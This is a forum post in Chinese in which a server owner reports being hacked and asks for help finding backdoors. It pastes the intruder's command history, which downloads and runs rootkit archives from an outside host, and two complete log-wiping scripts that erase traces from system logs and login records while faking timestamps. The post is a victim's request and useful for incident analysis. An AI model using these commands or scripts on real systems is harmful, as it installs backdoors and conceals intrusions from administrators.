哭,服务器今天被人黑了,请都下大家有什么办法?
这是有关记录exit
pwd
ps -U root
ps -U root
id
wget test4.go.ro/sbh5.tar.tar
wget test4.go.ro/shv5.tar.tar
tar zxvf shv5.tar.tar
cd shv5
./setuop
./setup muiema 54323
cd ..
id
ls
./led
./led
id
cd shv5
./setup muiema 54323
id
./setup muiema 54323
ls -alp
chmod +x *
./setup muiema 54323
_____________________
hide
_________
#!/bin/bash
echo " Linux Hider v2.0 by mave"
echo " enhanced by me! "
echo "[+] Removing $1 from the logs........ ."
echo ""
if [ -f /var/log/maillog ]; then
cat /var/log/maillog | grep -v $1 > /tmp/maillog.xz
touch -acmr /var/log/maillog /tmp/maillog.xz
mv -f /tmp/maillog.xz /var/log/maillog
echo "[+] /var/log/maillog ... "
echo ""
fi
if [ -f /var/log/messages ]; then
cat /var/log/messages | grep -v $1 > /tmp/messages.xz
touch -acmr /var/log/messages /tmp/messages.xz
mv -f /tmp/messages.xz /var/log/messages
echo "[+] /var/log/messages... "
sleep 2
echo ""
fi
if [ -f /var/log/secure ]; then
cat /var/log/secure | grep -v $1 > /tmp/secure.xz
touch -acmr /var/log/secure /tmp/secure.xz
mv -f /tmp/secure.xz /var/log/secure
echo "[+] /var/log/secure ... "
echo ""
fi
if [ -f /var/log/xferlog ]; then
cat /var/log/xferlog | grep -v $1 > /tmp/xferlog.xz
touch -acmr /var/log/xferlog /tmp/xferlog.xz
mv -f /tmp/xferlog.xz /var/log/xferlog
sleep 2
echo "[+] /var/log/xferlog ... "
echo ""
fi
if [ -f /var/run/utmp ]; then
cat /var/run/utmp | grep -v $1 > /tmp/utmp.xz
touch -acmr /var/run/utmp /tmp/utmp.xz
mv -f /tmp/utmp.xz /var/run/utmp
echo "[+] /var/run/utmp ... "
echo ""
fi
if [ -f /var/log/lastlog ]; then
cat /var/log/lastlog |grep -v $1 > /tmp/lastlog.xz
touch -acmr /var/log/lastlog /tmp/lastlog.xz
mv -f /tmp/lastlog.xz /var/log/lastlog
sleep 2
echo "[+] /var/log/lastlog ... "
echo ""
fi
if [ -f /var/log/wtmp ]; then
cat /var/log/wtmp |grep -v $1 > /tmp/wtmp.xz
touch -acmr /var/log/wtmp /tmp/wtmp.xz
mv -f /tmp/wtmp.xz /var/log/wtmp
echo "[+] /var/log/wtmp ... "
echo ""
fi
rm -f /tmp/*.xz
echo " * m i s s i o na c c o m p l i s h e d *"
echo ""
sleep 2
echo " p.h.e.e.rS.H.c.r.e.w"
echo ""
sleep 5
exit 1
__________________
shsb
________
#!/bin/bash
#
# sauber - by socked
#
# Usage: sauber <string>
BLK='[1;30m'
RED='[1;31m'
GRN='[1;32m'
YEL='[1;33m'
BLU='[1;34m'
MAG='[1;35m'
CYN='[1;36m'
WHI='[1;37m'
DRED='[0;31m'
DGRN='[0;32m'
DYEL='[0;33m'
DBLU='[0;34m'
DMAG='[0;35m'
DCYN='[0;36m'
DWHI='[0;37m'
RES='[0m'
echo "${BLK}* ${WHI}sauber ${DWHI}by ${WHI}s${BLU}o${DBLU}ck${BLK}ed [${DWHI}07${BLK}.${DWHI}27${BLK}.${DWHI}97${BLK}]${RES}"
if [ $# != 1 ]
then
echo "${BLK}* ${DWHI}Usage${WHI}: "`basename $0`" <${DWHI}string${WHI}>${RES}"
echo " "
exit
fi
echo "${BLK}*${RES}"
echo "${BLK}* ${DWHI}Cleaning logs.. This may take a bit depending on the size of the logs.${RES}"
WERD=$(/bin/ls -F /var/log | grep -v "/" | grep -v "*" | grep -v ".tgz" | grep -v ".gz" | grep -v ".tar" | grep -v "lastlog" | grep -v "utmp" | grep -v "wtmp" | grep -v "@")
for fil in $WERD
do
line=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
echo -n "${BLK}* ${DWHI}Cleaning ${WHI}$fil ($line ${DWHI}lines${WHI})${BLK}...${RES}"
grep -v $1 /var/log/$fil > new
touch -r /var/log/$fil new
mv -f new /var/log/$fil
newline=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
let linedel=$(($line-$newline))
echo "${WHI}$linedel ${DWHI}lines removed!${RES}"
done
killall -HUP syslogd
echo "${BLK}* ${DWHI}Alles sauber mein Meister !'Q%&@$! ${RES}"
谁能帮我上服务器看看还有没有后门呢??
页:
[1]